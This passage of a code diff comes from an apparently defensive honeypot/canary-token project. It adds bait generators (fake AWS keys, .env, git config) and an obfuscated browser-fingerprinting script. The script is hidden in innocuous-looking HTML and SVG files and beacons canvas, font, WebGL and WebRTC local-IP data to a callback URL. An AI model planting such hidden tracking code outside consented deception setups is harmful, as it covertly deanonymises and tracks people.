        return PdfInstrumenter()
    if name == "html":
        from decnet.canary.instrumenters.html import HtmlInstrumenter
        return HtmlInstrumenter()
    if name == "image":
        from decnet.canary.instrumenters.image import ImageInstrumenter
        return ImageInstrumenter()
    if name == "plain":
        from decnet.canary.instrumenters.plain import PlainInstrumenter
        return PlainInstrumenter()
    if name == "passthrough":
        from decnet.canary.instrumenters.passthrough import PassthroughInstrumenter
        return PassthroughInstrumenter()
    raise ValueError(
        f"Unknown canary instrumenter: {name!r}. Known: {KNOWN_INSTRUMENTERS}"
    )
 # MIME → instrumenter dispatch.  Order matters: we walk the table
 # top-to-bottom and the first prefix match wins, so put the more
 # specific (DOCX/XLSX) before the generic (zip/octet-stream).
 _MIME_DISPATCH: tuple[tuple[str, str], ...] = (
    # Office Open XML — DOCX/XLSX share a zip structure but expose
    # different inner trees, so dispatch by MIME alias rather than
    # zip-poking.
    ("application/vnd.openxmlformats-officedocument.wordprocessingml.document", "docx"),
    ("application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", "xlsx"),
    ("application/pdf", "pdf"),
    ("text/html", "html"),
    ("application/xhtml+xml", "html"),
    ("image/png", "image"),
    ("image/jpeg", "image"),
    ("image/gif", "image"),
    # Plaintext catch-alls — config files, .env, .ini, .yaml, .json,
    # source code.  All handled by the same regex-substitution pass.
    ("text/", "plain"),
    ("application/json", "plain"),
    ("application/x-yaml", "plain"),
    ("application/yaml", "plain"),
    ("application/toml", "plain"),
 )
 def pick_instrumenter_for_mime(content_type: str) -> str:
    """Return the instrumenter name registered for a sniffed MIME.
    Falls back to ``"passthrough"`` for anything we don't have an
    embedder for (binary blobs we can't mutate safely — random
    container images, archives, executables).  ``passthrough`` only
    supports DNS-callback tokens (the slug ends up in the filename or
    an accompanying README), so the API surfaces that constraint to
    the operator before they pick a kind.
    """
    if not content_type:
        return "passthrough"
    lowered = content_type.lower()
    for prefix, name in _MIME_DISPATCH:
        if lowered.startswith(prefix):
            return name
    return "passthrough"
--- a/decnet/canary/fingerprint_payload.js
+++ b/decnet/canary/fingerprint_payload.js
@@ -0,0 +1,292 @@
 // SPDX-License-Identifier: AGPL-3.0-or-later
 // Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
 // canary, harvests browser primitives, and beacons the result back to the
 // canary worker.  Ported from canary-self-test.html with the rendering UI
 // stripped out.
 //
 // Three placeholders are substituted by the Python builder BEFORE
 // javascript-obfuscator runs:
 //
 //   {{BEACON_URL}}  → full URL to /c/<callback_token> (no trailing slash)
 //   {{MINT_UUID}}   → per-mint UUID, baked into the string-array post-obf
 //   {{MINT_NONCE}}  → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
 //
 // Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
 // then a fingerprint payload sent as a base64-URL query param on a second
 // GET so the existing worker records the hit even before step-4 POST
 // support lands.  Both fail-open: any error short-circuits to next step.
 (async function () {
  var BEACON_URL = "{{BEACON_URL}}";
  var MINT_UUID = "{{MINT_UUID}}";
  var MINT_NONCE = "{{MINT_NONCE}}";
  var fp = { mint: MINT_UUID };
  function fire(url) {
    try {
      var img = new Image();
      img.src = url;
    } catch (e) { /* swallow */ }
  }
  // 1) bare-open beacon — fires regardless of whether the rest succeeds
  fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
  function sha256(str) {
    var buf = new TextEncoder().encode(str);
    return crypto.subtle.digest("SHA-256", buf).then(function (h) {
      return Array.from(new Uint8Array(h))
        .map(function (b) { return b.toString(16).padStart(2, "0"); })
        .join("");
    });
  }
  // navigator
  try {
    fp.nav = {
      ua: navigator.userAgent,
      pl: navigator.platform,
      lg: navigator.language,
      lgs: (navigator.languages || []).join(","),
      ck: navigator.cookieEnabled,
      dnt: navigator.doNotTrack,
      hc: navigator.hardwareConcurrency,
      dm: navigator.deviceMemory || null,
      tp: navigator.maxTouchPoints,
      wd: navigator.webdriver === true,
      pdf: navigator.pdfViewerEnabled || null,
    };
  } catch (e) { fp.nav = { err: String(e) }; }
  // screen
  try {
    fp.scr = {
      w: screen.width, h: screen.height,
      aw: screen.availWidth, ah: screen.availHeight,
      cd: screen.colorDepth, pd: screen.pixelDepth,
      dpr: window.devicePixelRatio,
      iw: window.innerWidth, ih: window.innerHeight,
      or: (screen.orientation && screen.orientation.type) || null,
    };
  } catch (e) { fp.scr = { err: String(e) }; }
  // tz / locale
  try {
    var dtf = Intl.DateTimeFormat().resolvedOptions();
    fp.tz = {
      z: dtf.timeZone, lc: dtf.locale,
      ca: dtf.calendar, ns: dtf.numberingSystem,
      off: new Date().getTimezoneOffset(),
    };
  } catch (e) { fp.tz = { err: String(e) }; }
  // connection
  try {
    var c = navigator.connection;
    fp.cn = c ? {
      t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
    } : null;
  } catch (e) { fp.cn = { err: String(e) }; }
  // canvas
  try {
    var cv = document.createElement("canvas");
    cv.width = 280; cv.height = 60;
    var ctx = cv.getContext("2d");
    ctx.textBaseline = "top";
    ctx.font = "14px Arial";
    ctx.fillStyle = "#f60";
    ctx.fillRect(125, 1, 62, 20);
    ctx.fillStyle = "#069";
    ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
    ctx.fillStyle = "rgba(102,204,0,0.7)";
    ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
    var dataURL = cv.toDataURL();
    fp.cv = { h: await sha256(dataURL), n: dataURL.length };
  } catch (e) { fp.cv = { err: String(e) }; }
  // webgl
  try {
    var gc = document.createElement("canvas");
    var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
    if (gl) {
      var ext = gl.getExtension("WEBGL_debug_renderer_info");
      fp.gl = {
        v: gl.getParameter(gl.VENDOR),
        r: gl.getParameter(gl.RENDERER),
        ver: gl.getParameter(gl.VERSION),
        sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
        uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
        ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
      };
    } else { fp.gl = { err: "unavailable" }; }
  } catch (e) { fp.gl = { err: String(e) }; }
  // audio
  try {
    var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
    if (ACtx) {
      var actx = new ACtx(1, 44100, 44100);
      var osc = actx.createOscillator();
      var cmp = actx.createDynamicsCompressor();
      osc.type = "triangle"; osc.frequency.value = 10000;
      cmp.threshold.value = -50; cmp.knee.value = 40;
      cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
      osc.connect(cmp); cmp.connect(actx.destination);
      osc.start(0);
      var buf = await actx.startRendering();
      var data = buf.getChannelData(0).slice(4500, 5000);
      var sum = 0;
      for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
      fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
    } else { fp.au = { err: "unavailable" }; }
  } catch (e) { fp.au = { err: String(e) }; }
  // fonts
  try {
    var bases = ["monospace", "sans-serif", "serif"];
    var tests = [
      "Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
      "Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
      "Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
      "JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
      "Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
      "San Francisco", "Helvetica Neue", "Lucida Grande",
      "DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
      "Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
      "Noto Sans", "Noto Mono",
      "Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
      "Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
      "Malgun Gothic", "Noto Sans CJK",
      "Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
      "Bahnschrift", "Cyberpunk",
    ];
    var sp = document.createElement("span");
    sp.style.fontSize = "72px";
    sp.style.position = "absolute";
    sp.style.left = "-9999px";
    sp.innerHTML = "mmmmmmmmmmlli";
    document.body.appendChild(sp);
    var bs = {};
    for (var bi = 0; bi < bases.length; bi++) {
      sp.style.fontFamily = bases[bi];
      bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
    }
    var det = [];
    for (var ti = 0; ti < tests.length; ti++) {
      for (var bj = 0; bj < bases.length; bj++) {
        sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
        if (sp.offsetWidth !== bs[bases[bj]].w ||
            sp.offsetHeight !== bs[bases[bj]].h) {
          det.push(tests[ti]); break;
        }
      }
    }
    document.body.removeChild(sp);
    fp.ft = {
      h: await sha256(det.slice().sort().join(",")),
      n: det.length, t: tests.length, d: det,
    };
  } catch (e) { fp.ft = { err: String(e) }; }
  // webrtc local ip leak
  try {
    var ips = {}; var cands = [];
    var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
              window.mozRTCPeerConnection;
    if (RPC) {
      var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
      pc.createDataChannel("");
      pc.onicecandidate = function (e) {
        if (!e.candidate) return;
        cands.push(e.candidate.candidate);
        var m = e.candidate.candidate.match(
          /(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
        if (m) ips[m[1]] = 1;
      };
      var off = await pc.createOffer();
      await pc.setLocalDescription(off);
      await new Promise(function (r) { setTimeout(r, 1500); });
      pc.close();
      fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
    } else { fp.rtc = { err: "unavailable" }; }
  } catch (e) { fp.rtc = { err: String(e) }; }
  // battery
  try {
    if (navigator.getBattery) {
      var bat = await navigator.getBattery();
      fp.bt = {
        c: bat.charging, l: bat.level,
        ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
        dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
      };
    } else { fp.bt = { err: "unavailable" }; }
  } catch (e) { fp.bt = { err: String(e) }; }
  // perf timing jitter
  try {
    var samples = [];
    for (var pi = 0; pi < 1000; pi++) {
      var pa = performance.now();
      var x = 0;
      for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
      samples.push(performance.now() - pa);
    }
    samples.sort(function (a, b) { return a - b; });
    fp.pf = {
      med: samples[500].toFixed(4),
      p95: samples[950].toFixed(4),
      mn: samples[0].toFixed(4),
      mx: samples[999].toFixed(4),
    };
  } catch (e) { fp.pf = { err: String(e) }; }
  // permissions
  try {
    if (navigator.permissions) {
      var names = ["geolocation", "notifications", "camera", "microphone",
                   "persistent-storage", "clipboard-read", "clipboard-write"];
      var st = {};
      for (var ni = 0; ni < names.length; ni++) {
        try {
          var r = await navigator.permissions.query({ name: names[ni] });
          st[names[ni]] = r.state;
        } catch (e) { st[names[ni]] = "unsupported"; }
      }
      fp.pm = st;
    } else { fp.pm = { err: "unavailable" }; }
  } catch (e) { fp.pm = { err: String(e) }; }
  // composite identity hash — stable inputs only
  try {
    var stable = [
      fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
      fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
      fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
      fp.scr && (fp.scr.w + "x" + fp.scr.h),
    ].filter(Boolean).join("|");
    fp.id = await sha256(stable);
  } catch (e) { fp.id = { err: String(e) }; }
  // 2) ship the payload as base64url JSON on a GET query param.
  //    The current worker records the hit on /c/<slug>; step-4 worker
  //    will decode ?d= and persist the fingerprint blob.
  try {
    var json = JSON.stringify(fp);
    var b64 = btoa(unescape(encodeURIComponent(json)))
      .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
    // chunk if URL would exceed safe limit (~6KB)
    var MAX = 6000;
    if (b64.length <= MAX) {
      fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
    } else {
      var sid = (Math.random() * 1e9 | 0).toString(36);
      var total = Math.ceil(b64.length / MAX);
      for (var ci = 0; ci < total; ci++) {
        var part = b64.substr(ci * MAX, MAX);
        fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
      }
    }
  } catch (e) { /* swallow */ }
 })();
--- a/decnet/canary/generators/init.py
+++ b/decnet/canary/generators/init.py
@@ -0,0 +1,8 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Built-in canary generators (synthesised fake artifacts).
 Concrete classes live in sibling modules and are imported lazily by
 :func:`decnet.canary.factory.get_generator` to keep the import-time
 cost of :mod:`decnet.canary` cheap for callers that only need the
 ABCs.
 """
--- a/decnet/canary/generators/aws_creds.py
+++ b/decnet/canary/generators/aws_creds.py
@@ -0,0 +1,87 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake ``~/.aws/credentials`` block (passive bait).
 This is the **passive** variant — no callback wiring.  An attacker
 who exfils these keys can't trip a detection unless we run a real
 AWS account with a deny-all CloudTrail listener (post-v1).  The
 realism is the point: the file looks like a routinely used credentials
 file, so the rest of the decky's persona feels lived-in.
 If the operator picks ``kind="aws_passive"`` we accept that no slug
 will be embedded.  If they pick ``kind="http"`` or ``kind="dns"`` for
 this generator, the API will reject the combination with a 400 — AWS
 keys have no plausible field where a URL or hostname survives a
 ``grep -E '[A-Z0-9]{20}'`` smell test.
 """
 from __future__ import annotations
 import hashlib
 from secrets import token_urlsafe
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 # Stable AWS-style key body derived from the slug.  Keeping the
 # generator deterministic (per-slug) means re-seeding produces the
 # same bytes — the planter is naturally idempotent and an operator
 # who runs ``decnet canary verify`` can re-derive the expected file
 # without touching the DB.
 def _fake_access_key(seed: str) -> str:
    # AWS access keys are 20 chars, uppercase alphanum, AKIA prefix.
    body = hashlib.sha256(seed.encode()).hexdigest().upper()
    return "AKIA" + body[:16]
 def _fake_secret_key(seed: str) -> str:
    # AWS secret keys are 40 chars, mixed-case base64-ish.  We use
    # base64-safe characters from token_urlsafe seeded by a SHA-256
    # of the seed so the output is stable per slug.
    h = hashlib.sha256(("secret:" + seed).encode()).digest()
    # Reuse token_urlsafe for the alphabet but pad to 40 chars from
    # the deterministic bytes so we don't depend on os.urandom.
    import base64
    return base64.b64encode(h)[:40].decode()
 class AWSCredsGenerator(CanaryGenerator):
    name = "aws_creds"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        seed = ctx.callback_token
        access = _fake_access_key(seed)
        secret = _fake_secret_key(seed)
        body = (
            "[default]\n"
            f"aws_access_key_id = {access}\n"
            f"aws_secret_access_key = {secret}\n"
            "region = us-east-1\n"
            "\n"
            "[prod]\n"
            f"aws_access_key_id = {_fake_access_key('prod-' + seed)}\n"
            f"aws_secret_access_key = {_fake_secret_key('prod-' + seed)}\n"
            "region = us-west-2\n"
        )
        return CanaryArtifact(
            path="",  # caller (planter) fills this from CanaryToken.placement_path
            content=body.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 14,  # 2 weeks ago — looks lived-in
            generator=self.name,
            notes=[
                "fake AWS keys; no callback embedded — passive bait only",
                f"derived deterministically from slug={seed}",
            ],
        )
 # Re-exported so the slug helper is reusable from the
 # instrumenters/passthrough module without an internal import path.
 __all__ = ["AWSCredsGenerator", "_fake_access_key", "_fake_secret_key"]
 # Imports at the bottom keep the public dataclasses on top — pylint
 # doesn't run on this repo, but tests do, and putting ``token_urlsafe``
 # in a public symbol confuses readers.  Suppress the unused warning by
 # referencing it once.
 _ = token_urlsafe
--- a/decnet/canary/generators/env_file.py
+++ b/decnet/canary/generators/env_file.py
@@ -0,0 +1,57 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake ``.env`` with embedded callback URLs.
 Modern web stacks read environment variables for everything from
 database DSNs to webhook URLs, so dropping a few realistic-looking
 ``KEY=value`` pairs alongside the canary URL is unremarkable.  The
 slug appears in two fields:
 * ``API_BASE_URL`` — the obvious one; an attacker scripting against
  the credentials hits the worker on first invocation.
 * ``WEBHOOK_NOTIFY_URL`` — secondary, in case the attacker greps for
  ``WEBHOOK`` and pivots there.
 Other fields (``DB_PASSWORD``, ``REDIS_URL``, ``JWT_SECRET``) are
 plausible but inert — they're realism filler, not detection
 mechanisms.
 """
 from __future__ import annotations
 import hashlib
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 def _stable_token(seed: str, prefix: str = "") -> str:
    h = hashlib.sha256((prefix + seed).encode()).hexdigest()
    return h[:32]
 class EnvFileGenerator(CanaryGenerator):
    name = "env_file"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        base = ctx.http_base.rstrip("/")
        slug = ctx.callback_token
        api_url = f"{base}/c/{slug}"
        body = (
            "# Production environment — DO NOT COMMIT\n"
            f"API_BASE_URL={api_url}\n"
            f"WEBHOOK_NOTIFY_URL={api_url}/webhook\n"
            f"DB_PASSWORD={_stable_token(slug, 'db:')}\n"
            f"REDIS_URL=redis://:{_stable_token(slug, 'redis:')[:16]}@redis.internal:6379/0\n"
            f"JWT_SECRET={_stable_token(slug, 'jwt:')}\n"
            "LOG_LEVEL=info\n"
            "ENVIRONMENT=production\n"
        )
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 7,  # last edited a week ago
            generator=self.name,
            notes=[
                f"API_BASE_URL embeds {api_url}",
                f"WEBHOOK_NOTIFY_URL embeds {api_url}/webhook",
            ],
        )
--- a/decnet/canary/generators/fingerprint_html.py
+++ b/decnet/canary/generators/fingerprint_html.py
@@ -0,0 +1,141 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """HTML fingerprint canary — plausible-looking page with an obfuscated
 browser-fingerprinting payload inlined at the bottom of ``<body>``.
 The visible content is a deliberately mundane "internal directory"
 table — the kind of file a curious attacker pulls off a decky's
 filesystem and opens locally to triage.  When the file is opened in
 *any* network-connected browser the obfuscated payload runs and beacons
 to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
 fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
 timing jitter, permissions, composite identity hash).
 Determinism: the mint UUID is derived from the callback token via
 :func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
 output, satisfying the generator contract in :mod:`decnet.canary.base`.
 The obfuscator's seed and polymorphic config bits are likewise
 callback-token-derived (see :mod:`decnet.canary.obfuscator`).
 """
 from __future__ import annotations
 import hashlib
 import uuid
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
 _MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
 def _mint_uuid_for(callback_token: str) -> str:
    return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
 def _stable_int(callback_token: str, salt: str = "") -> int:
    """Deterministic non-negative int derived from the callback token.
    ``builtins.hash`` is salted per-process — useless for a generator
    that must be byte-identical across runs.  SHA-256 prefix is
    overkill but free.
    """
    h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
    return int.from_bytes(h[:4], "big")
 _PAGE_TEMPLATE = """<!DOCTYPE html>
 <html lang="en">
 <head>
 <meta charset="utf-8">
 <title>Internal Asset Directory</title>
 <style>
 body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
 margin:24px;font-size:13px}}
 h1{{font-size:18px;margin:0 0 4px 0}}
 .sub{{color:#777;font-size:11px;margin-bottom:18px}}
 table{{border-collapse:collapse;width:100%;background:#fff;
 box-shadow:0 1px 2px rgba(0,0,0,.05)}}
 th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
 th{{background:#f4f4f4;font-weight:600;font-size:11px;
 text-transform:uppercase;letter-spacing:.5px;color:#555}}
 tr:hover td{{background:#fafbff}}
 .foot{{margin-top:16px;color:#999;font-size:11px}}
 </style>
 </head>
 <body>
 <h1>Internal Asset Directory</h1>
 <div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
 <table>
 <tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
 {rows}
 </table>
 <div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
 <script>{payload}</script>
 </body>
 </html>
 """
 _ROW_POOL = (
    ("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
    ("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
    ("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
    ("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
    ("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
    ("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
    ("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
    ("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
    ("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
 )
 def _build_rows(callback_token: str) -> tuple[str, int]:
    pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
    take = 5 + (_stable_int(callback_token, "take") % 4)
    selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
    cells = "\n".join(
        "<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
        for row in selected
    )
    return cells, len(selected)
 def _sync_label(callback_token: str) -> str:
    day = _stable_int(callback_token, "day") % 28 + 1
    hour = _stable_int(callback_token, "hour") % 24
    return f"2026-04-{day:02d} {hour:02d}:14 UTC"
 class FingerprintHtmlGenerator(CanaryGenerator):
    """Synthesise an HTML page that fingerprints the browser opening it."""
    name = "fingerprint_html"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        rows, row_count = _build_rows(ctx.callback_token)
        body = _PAGE_TEMPLATE.format(
            sync_label=_sync_label(ctx.callback_token),
            row_count=row_count,
            rows=rows,
            payload=payload,
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 14,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )
--- a/decnet/canary/generators/fingerprint_svg.py
+++ b/decnet/canary/generators/fingerprint_svg.py
@@ -0,0 +1,89 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """SVG fingerprint canary — standalone SVG with an embedded ``<script>``
 that runs the obfuscated fingerprinter when the file is opened directly
 in a browser.
 SVG ``<script>`` only fires when the SVG is loaded as a top-level
 document (or via ``<object>``/``<iframe>``); it's *blocked* when the
 SVG is referenced from another page's ``<img>``.  That's the right
 posture for canary use: an attacker browsing the decky filesystem and
 double-clicking a stray ``network_diagram.svg`` triggers it; rendering
 inside a sandboxed CMS preview does not.
 Same determinism guarantees as :mod:`fingerprint_html`.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
 from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
 _DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
 <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
 <style>
 .box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
 .lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
 .edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
 .title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
 .cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
 </style>
 <text class="title" x="20" y="28">Network Topology — {region} segment</text>
 <text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
 <rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
 <rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
 <rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
 <rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
 <text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
 <path class="edge" d="M160 105 L240 105"/>
 <path class="edge" d="M360 105 L440 105"/>
 <path class="edge" d="M300 130 L300 220"/>
 <script type="application/ecmascript"><![CDATA[
 {payload}
 ]]></script>
 </svg>
 """
 _REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
 class FingerprintSvgGenerator(CanaryGenerator):
    """Synthesise an SVG that fingerprints the browser opening it."""
    name = "fingerprint_svg"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
        day = _stable_int(ctx.callback_token, "day") % 28 + 1
        body = _DIAGRAM_TEMPLATE.format(
            region=region,
            ver=ver,
            review=f"2026-03-{day:02d}",
            payload=payload,
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 30,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )
--- a/decnet/canary/generators/git_config.py
+++ b/decnet/canary/generators/git_config.py
@@ -0,0 +1,54 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake ``.git/config`` with an attacker-bait remote URL.
 The ``[remote "origin"]`` ``url`` field is the natural place to embed
 an HTTP-callback URL: it's normal for git remotes to be HTTPS, the
 URL is read by every git command an attacker runs (``git pull``,
 ``git fetch``, ``git remote -v``), and the slug fits naturally as
 part of a path.
 The generator emits a plausible private-mirror remote (``git.<org>``
 or the canary host's hostname) so an attacker doesn't immediately
 recognise it as a honeypot.  The slug ends up in the URL path:
    [remote "origin"]
        url = https://canary.example.test/c/<slug>/repo.git
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 class GitConfigGenerator(CanaryGenerator):
    name = "git_config"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        # Strip trailing slash defensively — operator may have
        # configured DECNET_CANARY_HTTP_BASE either way.
        base = ctx.http_base.rstrip("/")
        slug = ctx.callback_token
        # The /c/<slug>/repo.git suffix gives us a realistic-looking
        # path the worker can route on a single ``startswith("/c/")``
        # check, while still surviving a quick grep for the slug.
        url = f"{base}/c/{slug}/repo.git"
        body = (
            "[core]\n"
            "\trepositoryformatversion = 0\n"
            "\tfilemode = true\n"
            "\tbare = false\n"
            "\tlogallrefupdates = true\n"
            "[remote \"origin\"]\n"
            f"\turl = {url}\n"
            "\tfetch = +refs/heads/*:refs/remotes/origin/*\n"
            "[branch \"main\"]\n"
            "\tremote = origin\n"
            "\tmerge = refs/heads/main\n"
        )
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 30,  # checked out a month ago
            generator=self.name,
            notes=[f"git remote 'origin' embeds {url}"],
        )
--- a/decnet/canary/generators/honeydoc.py
+++ b/decnet/canary/generators/honeydoc.py
@@ -0,0 +1,62 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Built-in honeydoc — a minimal HTML "report" with a tracking pixel.
 This is the *fallback* honeydoc used when the operator hasn't
 uploaded a real document.  The HTML instrumenter handles operator
 uploads via :mod:`decnet.canary.instrumenters.html`; this generator
 exists so the deploy-time baseline can plant *something* convincing
 without first prompting the operator to drop a file.
 The realism here is intentionally modest: a Documents-folder HTML
 page with internal-looking content and a 1×1 remote image at the
 bottom whose ``src`` is the canary callback URL.  Most desktop
 HTML renderers fetch the image as soon as the file is opened in a
 browser preview, so opening the doc trips the callback.
 Operators who want a richer artifact should upload their own DOCX
 or PDF; the corresponding instrumenter embeds the same callback in
 the appropriate format.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 class HoneydocGenerator(CanaryGenerator):
    name = "honeydoc"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        base = ctx.http_base.rstrip("/")
        slug = ctx.callback_token
        pixel_url = f"{base}/c/{slug}"
        body = (
            "<!DOCTYPE html>\n"
            "<html lang=\"en\">\n"
            "<head>\n"
            "<meta charset=\"utf-8\">\n"
            "<title>Q3 Operations Review — DRAFT</title>\n"
            "</head>\n"
            "<body>\n"
            "<h1>Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)</h1>\n"
            "<p>Forecast and remediation timeline below. Numbers are\n"
            "preliminary and subject to revision before the all-hands.</p>\n"
            "<table>\n"
            "<tr><th>Region</th><th>Incidents</th><th>MTTR (h)</th></tr>\n"
